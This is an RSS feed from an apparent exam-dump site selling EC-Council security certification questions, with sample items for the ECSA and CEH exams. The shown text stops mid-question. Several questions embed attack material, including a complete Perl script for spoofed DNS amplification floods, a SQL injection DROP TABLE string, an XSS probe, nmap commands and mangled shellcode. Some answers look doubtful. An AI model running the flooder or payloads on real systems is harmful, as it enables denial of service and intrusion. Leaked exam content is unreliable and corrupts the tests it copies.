<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>The latest IT certification exams on Visualexams &#187; EC-COUNCIL</title>
	<atom:link href="http://www.ibm-certification-exam.com/category/EC-COUNCIL/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.ibm-certification-exam.com</link>
	<description>Visualexams offer the best IBM certification exam dumps</description>
	<lastBuildDate>Tue, 07 Sep 2010 05:42:37 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>412-79 exam</title>
		<link>http://www.ibm-certification-exam.com/412-79-exam/</link>
		<comments>http://www.ibm-certification-exam.com/412-79-exam/#comments</comments>
		<pubDate>Mon, 16 Aug 2010 05:37:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[EC-COUNCIL]]></category>
		<category><![CDATA[412-79]]></category>

		<guid isPermaLink="false">http://www.ibm-certification-exam.com/?p=8241</guid>
		<description><![CDATA[EC-Council Certified Security Analyst (ECSA)
Exam Number/Code : 412-79
Exam Name : EC-Council Certified Security Analyst (ECSA)
Questions and Answers : 100 Q&#38;As

Visualexams certification prep 412-79 study materials are industry-best exam simulations that provide realistic simulations of IT certification exams. Our award-winning Visualexams 412-79 study materials are known as the most comprehensive and realistic available.
High quality and Value [...]]]></description>
			<content:encoded><![CDATA[<p>EC-Council Certified Security Analyst (ECSA)<br />
Exam Number/Code : 412-79<br />
Exam Name : EC-Council Certified Security Analyst (ECSA)<br />
Questions and Answers : 100 Q&amp;As</p>
<p><span id="more-8241"></span></p>
<p>Visualexams certification prep <strong><a href="http://www.just4exams.com/412-79/" target="_blank">412-79</a></strong> study materials are industry-best exam simulations that provide realistic simulations of IT certification exams. Our award-winning Visualexams 412-79 study materials are known as the most comprehensive and realistic available.</p>
<p>High quality and Value for the 412-79 Exam. 412-79 simulation study materials, including the examination questions and the answers, complete by our senior IT lecturers and the Visualexams product experts, included the current newest <strong><a href="http://www.4cert.com/412-79/" target="_blank">412-79 exam</a></strong> questions.</p>
<p>A wealth of preparation 412-79 study materials and 412-79 training exams are available for you. When you are ready to prepare for 412-79 exam, here&#8217;s where you should start.</p>
<p>412-79 exam is a EC-COUNCIL certification. With the complete collection of exam questions, Visualexams has assembled to take you through exam questions to your 412-79 Exam preparation. In the 412-79 exam resources, you will cover every field and category in EC-COUNCIL Certification helping to ready you for your successful <strong><a href="http://www.4cert.org/412-79/" target="_blank">EC-COUNCIL 412-79</a></strong> Certification.</p>
<p>This web site is fully equipped with resources and EC-COUNCIL 412-79 exam questions. It also contains EC-COUNCIL 412-79 practice test, test dump, which can help a candidate for test preparation pass an examination. Your training is made a lot easier as you can download 412-79 braindump exams and testing software from the Visualexams.</p>
<p>Visualexams 412-79 is written to coincide with the real test by the experienced IT experts and specialists. With the complete collection of Visualexams Questions and Answers, Visualexams 412-79 is high enough to help the candidates to pass this <strong><a href="http://www.ultraexam.com/412-79/" target="_blank">412-79 braindump</a></strong> exam easily without any other study materials and no need to attend the expensive training.</p>
<p>Visualexams is one of most popular websites all over the world. It keeps excellent information on IT Certifications and provides the current data. It has not only <strong><a href="http://www.visualexams.com/412-79.htm" target="_blank">412-79</a></strong> thorough information on every certification but also provides you your required study materials for your targeted certification.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ibm-certification-exam.com/412-79-exam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>312-50 practice test</title>
		<link>http://www.ibm-certification-exam.com/312-50-practice-test/</link>
		<comments>http://www.ibm-certification-exam.com/312-50-practice-test/#comments</comments>
		<pubDate>Fri, 19 Mar 2010 05:32:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[EC-COUNCIL]]></category>
		<category><![CDATA[312-50]]></category>
		<category><![CDATA[practice test]]></category>

		<guid isPermaLink="false">http://www.ibm-certification-exam.com/?p=4502</guid>
		<description><![CDATA[Visualexams Certified Professionals update its Visualexams 312-50 Certification Training Material regularly to maintain accuracy and high quality. We have always been providing updated and accurate Visualexams EC-COUNCIL 312-50 Practice Questions and Answers with Explanations to hundreds of now successful Exam candidates.

As with every visual exams guaranteed product, you will have the knowledge of EC-COUNCIL 312-50 [...]]]></description>
			<content:encoded><![CDATA[<p>Visualexams Certified Professionals update its Visualexams <strong><a href="http://www.visualexams.com/312-50.htm">312-50</a></strong> Certification Training Material regularly to maintain accuracy and high quality. We have always been providing updated and accurate Visualexams EC-COUNCIL 312-50 Practice Questions and Answers with Explanations to hundreds of now successful Exam candidates.</p>
<p><span id="more-4502"></span></p>
<p>As with every <strong><a href="http://www.visualexams.com/">visual exams</a></strong> guaranteed product, you will have the knowledge of EC-COUNCIL 312-50 exam personal trainers at your hands. With the Visualexams 312-50 practice exam you not only get questions and answers, but you will also get qualified and accurate explanations so that you get a firm grasp of the 312-50 exam information.</p>
<p>EC-Council presents the body of knowledge through CEH to educate and assist information security professionals in hacking tools and techniques for legally accepted security testing purposes. It is the social responsibility of <strong><a href="http://www.visualexams.com/EC-COUNCIL-exam.htm" target="_blank">EC-Council certification</a></strong> to ensure that this knowledge is imparted to people with the right intent and obtain assurance that this body of knowledge will not be misused.</p>
<p>The 312-50 braindump as well as our other 312-50 exam training tools are not only priced to be easy on your budget &#8211; but each one is also backed with our guarantee. Visualexams guarantees that after using our ECCouncil certification training tools, you will be prepared to take and pass your ECCouncil exam.</p>
<p><strong>The related exams:</strong><br />
<a href="http://www.visualexams.com/350-001.htm">350-001</a> CCIE Cisco Certified Internetworking Expert<br />
<a href="http://www.visualexams.com/350-018.htm">350-018</a> CCIE Pre-Qualification Test for Security<br />
<a href="http://www.visualexams.com/350-030.htm">350-030</a> CCIE Voice Written<br />
<a href="http://www.visualexams.com/3I0-008.htm">3I0-008</a> ACI DEALING CERTIFICATE</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ibm-certification-exam.com/312-50-practice-test/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>exam EC0-349 study guide</title>
		<link>http://www.ibm-certification-exam.com/exam-ec0-349-study-guide/</link>
		<comments>http://www.ibm-certification-exam.com/exam-ec0-349-study-guide/#comments</comments>
		<pubDate>Fri, 29 Jan 2010 09:37:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[EC-COUNCIL]]></category>
		<category><![CDATA[certinside]]></category>
		<category><![CDATA[visualexams]]></category>
		<category><![CDATA[EC0-349 study guide]]></category>
		<category><![CDATA[exam EC0-349]]></category>

		<guid isPermaLink="false">http://www.ibm-certification-exam.com/?p=3521</guid>
		<description><![CDATA[For any IT professional, being EC-COUNCIL EC0-349  can be the high of his career. In fact, only being associated with EC-COUNCIL can change the entire perspective of an employer towards your services profile and repertoire. Deciding to go Designing EC-COUNCIL Network Service Architectures Exam (ARCH) is indeed the most apt decision according to current times [...]]]></description>
			<content:encoded><![CDATA[<p>For any IT professional, being EC-COUNCIL <strong><a href="http://www.certinside.com/EC0-349.html">EC0-349</a></strong>  can be the high of his career. In fact, only being associated with EC-COUNCIL can change the entire perspective of an employer towards your services profile and repertoire. Deciding to go Designing EC-COUNCIL Network Service Architectures Exam (ARCH) is indeed the most apt decision according to current times and thus a beneficial one. Allow GotCertified.com to be an equal contributing factor. Choose Certinside products as your means and get the proper platform to launch your career from. Certinside products promise to give your career that extra “X” factor that can take it to the skies.</p>
<p><span id="more-3521"></span></p>
<p>Taking the decision of going with EC-COUNCIL EC0-349.<br />
There are numerous IT professionals out there who are having a go at establishing their careers. However, not all end up having a successful time. Today, is the age of cutting edge competition and only that individual/company gets to win the race that has something extra to offer. Through EC-COUNCIL <strong><a href="http://www.visualexams.com/EC0-349.htm">EC0-349  exam</a></strong>, you too have a chance to offer that something extra. Being endorsed by EC-COUNCIL alone vouches for your expertise as well as proficiency worldwide, and this can get your career going. This also implies that a lot of hard work will have to go into this, before you achieve anything. And even then, one can never be sure if the hard work is being put in the right direction, or not.</p>
<p>Certinside’s direction is the right direction. This is the only path that guarantees of going in the right direction. Only Certinside’s products are guaranteed to bring you success in the exam. Now all that you have to do is register for EC0-349  and let Certinside manage the rest.</p>
<p>The related exams:<br />
<a href="http://www.visualexams.com/642-972.htm"><strong>642-972</strong></a> Data Center Application Services Design<br />
<a href="http://www.visualexams.com/642-973.htm"><strong>642-973</strong></a> Cisco Data Center Networking Infrastructure<br />
<a href="http://www.visualexams.com/642-974.htm"><strong>642-974</strong></a> Data Center Networking Infrastructure Support Specialist</p>
<p>What is Certinside all about? How does one prepare for EC0-349  with Certinside?</p>
<p>Certinside rightfully deals an IT test as a board exam. The first thing you have to do with Certinside is check out the sample objectives. You will get an idea of the actual products. Once you have the hang of the pattern of the test exam will be a piece of cake. Since the test comprises of multiple choice questions, in preparation of the test choice making is the most important thing to learn. Then you also need to learn a lot before appearing in the actual exam. In the exam answers are usually tricky and hence preparing on your own can be a tad bit difficult.</p>
<p>With Certinside you will first get a pdf study guide that will explain the study plan. Then it is up to you if you want to study questions and answers, the study guide, the audio files or the preparation labs. Only book study is not going to do you any good and methodical yet precise studying is of extreme importance.</p>
<p>What does Certinside have for you to offer, for <strong><a href="http://www.ibm-certification-exam.com/Network-Appliance/exam-ec0-349-study-guide/">EC-COUNCIL EC0-349</a></strong> ?<br />
Practically everything that you will ever need- Certinside EC0-349  is indeed a highly qualified examination, and adequate preparation has to be made too in order to pass the exam. Vigilant exams practice is needed before a professional is qualified to appear in the certification exams. Only with heavy preparation and proper guide certification exams can be attempted and passed.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ibm-certification-exam.com/exam-ec0-349-study-guide/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New EC0-479 exam on Certinside</title>
		<link>http://www.ibm-certification-exam.com/EC0-479/</link>
		<comments>http://www.ibm-certification-exam.com/EC0-479/#comments</comments>
		<pubDate>Mon, 03 Aug 2009 11:18:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[EC-COUNCIL]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[
				   EC0-479 Exam Description
					Questions and Answers:100 Q&#038;As  
					Updated:  2009-09-27 
					Exam Number/Code: EC0-479
					Exam Name: EC-Council Certified Security Analyst(ECSA)

					Certinside professional IT Q&#038;A vendors, we provide well after-sale service. To all the customers buy the Q&#038;As, we provide track service. when you buy the Q&#038;As with in 3 months. you can enjoy the upgrade [...]]]></description>
			<content:encoded><![CDATA[<div  class="left">
				   <strong>EC0-479 Exam Description</span></strong><br />
					Questions and Answers:<strong>100</strong> Q&#038;As <br /> <br />
					Updated:  <strong>2009-09-27</strong> <br />
					Exam Number/Code: <strong>EC0-479</strong><br />
					Exam Name: <strong>EC-Council Certified Security Analyst(ECSA)</strong></p>
<p><span id="more-1244"></span></p>
<p>					<a href="http://www.certinside.com/" target="_blank"><strong>Certinside</strong></a> professional IT Q&#038;A vendors, we provide well after-sale service. To all the customers buy the Q&#038;As, we provide track service. when you buy the Q&#038;As with in 3 months. you can enjoy the upgrade Q&#038;As service for free. If in this period, the certified test center change the <a href="http://www.certinside.com/EC-COUNCIL.html" target="_blank"><strong>EC-COUNCIL</strong></A> <a href="http://www.certinside.com/E-Commerce-Architect.html" target="_blank"><strong>E-Commerce Architect</strong></a> <a href="http://www.certinside.com/EC0-479.html" target="_blank">EC0-479</a> Q&#038;As, we will update the Q&#038;A in the first time, and provide you the download update for free</div>
<div class="exam_info">
<p>				<strong>EC0-479 Free Demo Download</strong><br />
					<P><a href="http://www.certinside.com/" target="_blank"><strong>Certinside</strong></a> offers free demo for <a href="http://www.certinside.com/EC0-479.html" target="_blank">EC0-479</a> 100 Q &#038; As with Expert Explanations). You can check out the interface, question quality and usability of our practice exams before you decide to buy it. <BR><BR><br />
					<a href="http://pdfdemo.certinside.com/EC0-479.pdf" style="font-size:14px;color:#f30" target="_blank">Download EC0-479 Exam Pdf Demo</a><BR><br />
					<a href="http://iengine.certinside.com/EC0-479.zip" style="font-size:14px;color:#f30" target="_blank">Download EC0-479 Exam iEngine Demo</a><br />
									  </P></p>
<p>
				　<br />
　<br />
Exam	  :  EC-Council EC0-479<br />
Title   :  EC-Council Certified Security Analyst (ECSA)</p>
<p>
1.  You are assisting a Department of Defense contract company to become compliant with the stringent security policies set by the DoD.  One such strict rule is that firewalls must only allow incoming connections that were first initiated by internal computers.  What type of firewall must you implement to abide by this policy?<br />
A. Packet filtering firewall<br />
B. Circuit-level proxy firewall<br />
C. Application-level proxy firewall<br />
D. Statefull firewall<br />
Answer: D</p>
<p>2.  An &quot;idle&quot; system is also referred to as what?<br />
A. PC not connected to the Internet<br />
B. Zombie<br />
C. PC not being used<br />
D. Bot<br />
Answer: B</p>
<p>3.  Jessica works as systems administrator for a large electronics firm.  She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests.  What type of scan is Jessica going to perform?<br />
A. Tracert<br />
B. Smurf scan<br />
C. Ping trace<br />
D. ICMP ping sweep<br />
Answer: D</p>
<p>4.  When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?<br />
A. Passive IDS<br />
B. Active IDS<br />
C. Progressive IDS<br />
D. NIPS<br />
Answer: B</p>
<p>5.  What will the following command produce on a website login page?<br />
SELECT email, passwd, login_id, full_name<br />
FROM members<br />
WHERE email = &#8217;someone@somehwere.com&#8217;; DROP TABLE members; &#8211;&#8217;<br />
A. Deletes the entire members table<br />
B. Inserts the Error! Reference source not found. email address into the members table<br />
C. Retrieves the password for the first user in the members table<br />
D. This command will not produce anything since the syntax is incorrect<br />
Answer: A</p>
<p>6.  What is the following command trying to accomplish? C:&gt; nmap -sU -p445 192.168.0.0/24<br />
A. Verify that UDP port 445 is open for the 192.168.0.0 network<br />
B. Verify that TCP port 445 is open for the 192.168.0.0 network<br />
C. Verify that NETBIOS is running for the 192.168.0.0 network<br />
D. Verify that UDP port 445 is closed for the 192.168.0.0 network<br />
Answer: A</p>
<p>7.  You are a security analyst performing a penetration tests for a company in the Midwest.  After some initial reconnaissance, you discover the IP addresses of some Cisco routers used by the company. You type in the following URL that includes the IP address of one of the routers:<br />
http://172.168.4.131/level/99/exec/show/config<br />
After typing in this URL, you are presented with the entire configuration file for that router.  What have you discovered?<br />
A. HTTP Configuration Arbitrary Administrative Access Vulnerability<br />
B. HTML Configuration Arbitrary Administrative Access Vulnerability<br />
C. Cisco IOS Arbitrary Administrative Access Online Vulnerability<br />
D. URL Obfuscation Arbitrary Administrative Access Vulnerability<br />
Answer: A</p>
<p>8.  Michael works for Kimball Construction Company as senior security analyst.  As part of yearly security audit, Michael scans his network for vulnerabilities.  Using Nmap, Michael conducts XMAS scan and most of the ports scanned do not give a response.  In what state are these ports?<br />
A. Closed<br />
B. Open<br />
C. Stealth<br />
D. Filtered<br />
Answer: B</p>
<p>9.  You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company clients.  You have rummaged through their trash and found very little information.  You do not want to set off any alarms on their network, so you plan on performing passive footprinting against their Web servers. What tool should you use?<br />
A. Ping sweep<br />
B. Nmap<br />
C. Netcraft<br />
D. Dig<br />
Answer: C</p>
<p>10.  Simon is a former employee of Trinitron XML Inc.  He feels he was wrongly terminated and wants to hack into his former company&#8217;s network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG.  What is Simon trying to accomplish here?<br />
A. Send DOS commands to crash the DNS servers<br />
B. Perform DNS poisoning<br />
C. Perform a zone transfer<br />
D. Enumerate all the users in the domain<br />
Answer: C</p>
<p>11.  If an attacker&#8217;s computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?<br />
A. The zombie will not send a response<br />
B. 31402<br />
C. 31399<br />
D. 31401<br />
Answer: D</p>
<p>12.  Larry is an IT consultant who works for corporations and government agencies. Larry plans on shutting down the city&#8217;s network using BGP devices and ombies?  What type of Penetration Testing is Larry planning to carry out?<br />
A. Router Penetration Testing<br />
B. DoS Penetration Testing<br />
C. Firewall Penetration Testing<br />
D. Internal Penetration Testing<br />
Answer: B</p>
<p>13.  You are carrying out the last round of testing for your new website before it goes live.  The website has many dynamic pages and connects to a SQL backend that accesses your product inventory in a database.  You come across a web security site that recommends inputting the following code into a search field on web pages to check for vulnerabilities:<br />
&lt;script&gt;alert(&quot;This is a test.&quot;)&lt;/script&gt;<br />
When you type this and click on search, you receive a pop-up window that says:<br />
&quot;This is a test.&quot;<br />
What is the result of this test?<br />
A. Your website is vulnerable to CSS<br />
B. Your website is not vulnerable<br />
C. Your website is vulnerable to SQL injection<br />
D. Your website is vulnerable to web bugs<br />
Answer: A</p>
<p>14.  You are the network administrator for a small bank in Dallas, Texas.  To ensure network security, you enact a security policy that requires all users to have 14 character passwords. After giving your users 2 weeks notice, you change the Group Policy to force 14 character passwords.  A week later you dump the SAM database from the standalone server and run a password-cracking tool against it.  Over 99% of the passwords are broken within an hour.  Why were these passwords cracked so quickly?<br />
A. Passwords of 14 characters or less are broken up into two 7-character hashes<br />
B. A password Group Policy change takes at least 3 weeks to completely replicate throughout a network<br />
C. Networks using Active Directory never use SAM databases so the SAM database pulled was empty<br />
D. The passwords that were cracked are local accounts on the Domain Controller<br />
Answer: A</p>
<p>15.  You setup SNMP in multiple offices of your company.  Your SNMP software manager is not receiving data from other offices like it is for your main office.  You suspect that firewall changes are to blame.  What ports should you open for SNMP to work through Firewalls (Select 2)<br />
A. 162<br />
B. 161<br />
C. 163<br />
D. 160<br />
Answer: AB</p>
</p></div>
]]></content:encoded>
			<wfw:commentRss>http://www.ibm-certification-exam.com/EC0-479/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New EC0-350 exam on Certinside</title>
		<link>http://www.ibm-certification-exam.com/EC0-350/</link>
		<comments>http://www.ibm-certification-exam.com/EC0-350/#comments</comments>
		<pubDate>Mon, 03 Aug 2009 11:18:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[EC-COUNCIL]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[
				   EC0-350 Exam Description
					Questions and Answers:339 Q&#038;As  
					Updated:  2009-09-09 
					Exam Number/Code: EC0-350
					Exam Name: ethical hacking and countermeasures

					Certinside professional IT Q&#038;A vendors, we provide well after-sale service. To all the customers buy the Q&#038;As, we provide track service. when you buy the Q&#038;As with in 3 months. you can enjoy the upgrade [...]]]></description>
			<content:encoded><![CDATA[<div  class="left">
				   <strong>EC0-350 Exam Description</span></strong><br />
					Questions and Answers:<strong>339</strong> Q&#038;As <br /> <br />
					Updated:  <strong>2009-09-09</strong> <br />
					Exam Number/Code: <strong>EC0-350</strong><br />
					Exam Name: <strong>ethical hacking and countermeasures</strong></p>
<p><span id="more-1219"></span></p>
<p>					<a href="http://www.certinside.com/" target="_blank"><strong>Certinside</strong></a> professional IT Q&#038;A vendors, we provide well after-sale service. To all the customers buy the Q&#038;As, we provide track service. when you buy the Q&#038;As with in 3 months. you can enjoy the upgrade Q&#038;As service for free. If in this period, the certified test center change the <a href="http://www.certinside.com/EC-COUNCIL.html" target="_blank"><strong>EC-COUNCIL</strong></A> <a href="http://www.certinside.com/Certified-Ethical-Hacker.html" target="_blank"><strong>Certified Ethical Hacker</strong></a> <a href="http://www.certinside.com/EC0-350.html" target="_blank">EC0-350</a> Q&#038;As, we will update the Q&#038;A in the first time, and provide you the download update for free</div>
<div class="exam_info">
<p>				<strong>EC0-350 Free Demo Download</strong><br />
					<P><a href="http://www.certinside.com/" target="_blank"><strong>Certinside</strong></a> offers free demo for <a href="http://www.certinside.com/EC0-350.html" target="_blank">EC0-350</a> 339 Q &#038; As with Expert Explanations). You can check out the interface, question quality and usability of our practice exams before you decide to buy it. <BR><BR><br />
					<a href="http://pdfdemo.certinside.com/EC0-350.pdf" style="font-size:14px;color:#f30" target="_blank">Download EC0-350 Exam Pdf Demo</a><BR><br />
					<a href="http://iengine.certinside.com/EC0-350.zip" style="font-size:14px;color:#f30" target="_blank">Download EC0-350 Exam iEngine Demo</a><br />
									  </P></p>
<p>
				　<br />
　<br />
Exam	  :  EC-Council EC0-350<br />
Title    :  Ethical Hacking and Countermeasures</p>
<p>
1.  The United Kingdom (UK) has passed a law that makes hacking into an unauthorized network a felony.<br />
The law states:<br />
Section 1 of the Act refers to unauthorized access to computer material. This states that a person commits an offence if he causes a computer to perform any function with intent to secure unauthorized access to any program or data held in any computer. For a successful conviction under this part of the Act, the prosecution must prove that the access secured is unauthorized and that the suspect knew that this was the case. This section is designed to deal with common-or-garden hacking.<br />
Section 2 of the Act deals with unauthorized access with intent to commit or facilitate the commission of further offences. An offence is committed under Section 2 if a Section 1 offence has been committed and there is the intention of committing or facilitating a further offence (any offence which attracts a custodial sentence of more than five years, not necessarily one covered by the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1 offence is still committed.<br />
Section 3 offences cover unauthorized modification of computer material, which generally means the creation and distribution of viruses. For a conviction to succeed there must have been the intent to cause the modification, and knowledge that the modification had not been authorized.<br />
What is this law called?<br />
A. Computer Misuse Act 1990<br />
B. Computer Incident Act 2000<br />
C. Cyber Crime Law Act 2003<br />
D. Cyber Space Crime Act 1995<br />
Answer: A</p>
<p>2.  You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker?<br />
A. 5 minutes<br />
B. 23 days<br />
C. 200 years<br />
D. 16 million years<br />
Answer: A</p>
<p>3.  Once an intruder has access to a remote system with a valid username and password, the attacker will attempt to increase his privileges by escalating the compromised account to one having increased privileges, such as that of an administrator. What would be the best countermeasure to protect against such escalation?<br />
A. Give users tokens<br />
B. Give users two passwords<br />
C. Give users a strong policy document<br />
D. Give user the least amount of privileges<br />
Answer: D</p>
<p>4.  You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in footprinting the organization?<br />
A. The IP range used by the target network<br />
B. How strong the corporate security policy is<br />
C. The types of operating systems and applications being used<br />
D. An understanding of the number of employees in the company<br />
Answer: C</p>
<p>5.  while investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspects workstation. He comes across a file that is just called &quot;file.txt&quot; but when he opens it, he finds the following:<br />
#define MAKE_STR_FROM_RET(x) ((x)&amp;0xff),(((x)&amp;0xff00)&gt;&gt;8),(((x)&amp;0xff0000)&gt;&gt;16),(((x)&amp;0xff000000)&gt;&gt;24)<br />
char infin_loop[]= /* for testing purposes */<br />
&quot;xEBxFE&quot;;<br />
char bsdcode[] = /* Lam3rZ chroot() code by venglin */<br />
&quot;x31xc0&#215;50x50&#215;50xb0&#215;7excdx80&#215;31xdbx31xc0&#215;43&quot;<br />
&quot;x43&#215;53x4bx53&#215;53xb0&#215;5axcdx80xebx77&#215;5ex31xc0&quot;<br />
&quot;x8dx5ex01&#215;88x46&#215;04x66&#215;68xffxffx01&#215;53x53xb0&quot;<br />
&quot;x88xcdx80&#215;31xc0&#215;8dx5ex01&#215;53x53xb0&#215;3dxcdx80&quot;<br />
&quot;x31xc0&#215;31xdbx8dx5ex08&#215;89x43&#215;02x31xc9xfexc9&quot;<br />
&quot;x31xc0&#215;8dx5ex08&#215;53x53xb0&#215;0cxcdx80xfexc9&#215;75&quot;<br />
&quot;xf1&#215;31xc0&#215;88x46&#215;09x8dx5ex08&#215;53x53xb0&#215;3dxcd&quot;<br />
&quot;x80xfex0exb0&#215;30xfexc8&#215;88x46&#215;04x31xc0&#215;88x46&quot;<br />
&quot;x07&#215;89x76&#215;08x89&#215;46x0cx89xf3&#215;8dx4ex08&#215;8dx56&quot;<br />
&quot;x0cx52&#215;51x53&#215;53xb0&#215;3bxcdx80&#215;31xc0&#215;31xdbx53&quot;<br />
&quot;x53xb0&#215;01xcdx80xe8&#215;84xffxffxffxffx01xffxffx30&quot;<br />
&quot;x62&#215;69x6ex30&#215;73x68&#215;31x2ex2ex31&#215;31x76&#215;65x6e&quot;<br />
&quot;x67&#215;6cx69&#215;6e&quot;;<br />
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];<br />
static char *magic_str=NULL;<br />
int before_len=0;<br />
What can he infer from this file?<br />
A. An encrypted file<br />
B. A uuencoded file<br />
C. A buffer overflow<br />
D. A picture that has been renamed with a .txt extension<br />
Answer: C</p>
<p>6.  What does this symbol mean?<br />
A. Open access point<br />
B. WPA encrypted access point<br />
C. WEP encrypted access point<br />
D. Closed access point<br />
Answer: A</p>
<p>7.  Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the recommendations for securing the operating system and IIS. These servers are going to run numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is still concerned about the security of these servers because of the potential for financial loss. Bob has asked his companys firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network.Why will this not be possible?<br />
A. Firewalls cannot inspect traffic coming through port 443<br />
B. Firewalls can only inspect outbound traffic<br />
C. Firewalls cannot inspect traffic coming through port 80<br />
D. Firewalls cannot inspect traffic at all, they can only block or allow certain ports<br />
Answer: D</p>
<p>8.  A Hacker would typically use a botnet to send a large number of queries to open DNS servers. These queries will be &quot;spoofed&quot; to look like they come from the target of the flooding, and the DNS server will reply to that network address.<br />
It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the attacking machines, which are identifiable. But blocking queries from DNS servers brings problems in its wake. A DNS server has a valid role to play in the workings of the Internet. Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail or visiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger than the request.<br />
The following perl code can launch these attacks.<br />
use Net::DNS::Resolver;<br />
use Net::RawIP;<br />
open(LIST,&quot;ns.list&quot;);<br />
@list=&lt;LIST&gt;;<br />
close LIST;<br />
chomp(@list);<br />
my $lnum=@list;<br />
my $i=0;<br />
my $loop=0;<br />
if ($ARGV[0] eq &#8221;) {<br />
print &quot;Usage: ./hackme.pl &lt;target IP&gt; &lt;loop count&gt;n&quot;;<br />
exit(0);<br />
}<br />
while($loop &lt; $ARGV[1]) {<br />
while($i &lt; $lnum) {<br />
my $source = $ARGV[0];<br />
my $dnspkt = new Net::DNS::Packet(&quot;google.com&quot;,&quot;ANY&quot;);<br />
my $pktdata = $dnspkt-&gt;data;<br />
my $sock = new Net::RawIP({udp=&gt;{}});<br />
$sock-&gt;set({ip =&gt; { saddr =&gt; $source, daddr =&gt; $list[$i], frag_off=&gt;0,tos=&gt;0,id=&gt;1565}, udp =&gt; {source =&gt; 53, dest =&gt; 53, data=&gt;$pktdata} });<br />
$sock-&gt;send;<br />
$i++;<br />
}$loop++; $i=0;}<br />
exit(0);<br />
What type of attacks are these?<br />
A. DNS reflector and amplification attack<br />
B. DNS cache poisoning attacks<br />
C. DNS reverse connection attacks<br />
D. DNS forward lookup attacks<br />
Answer: A</p>
<p>9.  Spears Technology, Inc is a software development company located in Los Angeles, California. They reported a breach in security, stating that its &quot;security defenses has been breached and exploited for 2 weeks by hackers.&quot; The hackers had accessed and downloaded 90,000 addresses containing customer credit cards and passwords. Spears Technology found this attack to be so severe that they reported the attack to the FBI for a full investigation. Spears Technology was looking to law enforcement officials to protect their intellectual property.<br />
How did this attack occur? The intruder entered through an employees home machine, which was connected to Spears Technologys corporate VPN network. The application called BEAST Trojan was used in the attack to open a &quot;back door&quot; allowing the hackers undetected access. The security breach was discovered when customers complained about the usage of their credit cards without their knowledge.<br />
The hackers were traced back to Beijing, China through e-mail address evidence. The credit card information was sent to that same e-mail address. The passwords allowed the hackers to access Spears Technologys network from a remote location, posing as employees. The intent of the attack was to steal the source code for their VOIP system and &quot;hold it hostage&quot; from Spears Technology, in exchange for ransom.<br />
The hackers had intended on selling the stolen VOIP software source code to competitors.<br />
How would you prevent such attacks from occurring in the future at Spears Technology?<br />
A. Disable VPN access to all your employees from home machines<br />
B. Allow VPN access but replace the standard authentication with biometric authentication<br />
C. Replace the VPN access with dial-up modem access to the companys network<br />
D. Enable 25 character complex password policy for employees to access the VPN network<br />
Answer: A</p>
<p>10.  What is the most common vehicle for social engineering attacks?<br />
A. Email<br />
B. Direct in person<br />
C. Local Area Networks<br />
D. Peer to Peer networks<br />
Answer: B</p>
<p>11.  Travis works primarily from home as a medical transcriptionist. He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM. He uses voice recognition software to help him transfer what he dictates to electronic documents. The voice recognition software is processor intensive, which is why he bought the new computer. Travis frequently has to get on the Internet to do research on what he is working on. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to. Travis uses antivirus software, anti-spyware software, and always keeps the computer up-to-date with Microsoft patches.After another month of working on the computer, Travis?computer is even more noticeably slow. Every once in awhile, Travis also notices a window or two pop-up on his screen, but they quickly disappear. He has seen these windows show up, even when he has not been on the Internet. Travis is really worried about his computer because he spent a lot of money on it, and he depends on it to work. Travis scans his computer with all kinds of software, and cannot find anything out of the ordinary. Travis decides to go through Windows Explorer and check out the file system, folder by folder, to see if there is anything he can find. He spends over four hours pouring over the files and folders and cannot find anything. But, before he gives up, he notices that his computer only has about 10 GB of free space available. Since his hard drive is a 200 GB hard drive, Travis thinks this is very odd. ?<br />
Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer. According to his calculations, he should have around 150 GB of free space. What is mostly likely the cause of Travis?problems?<br />
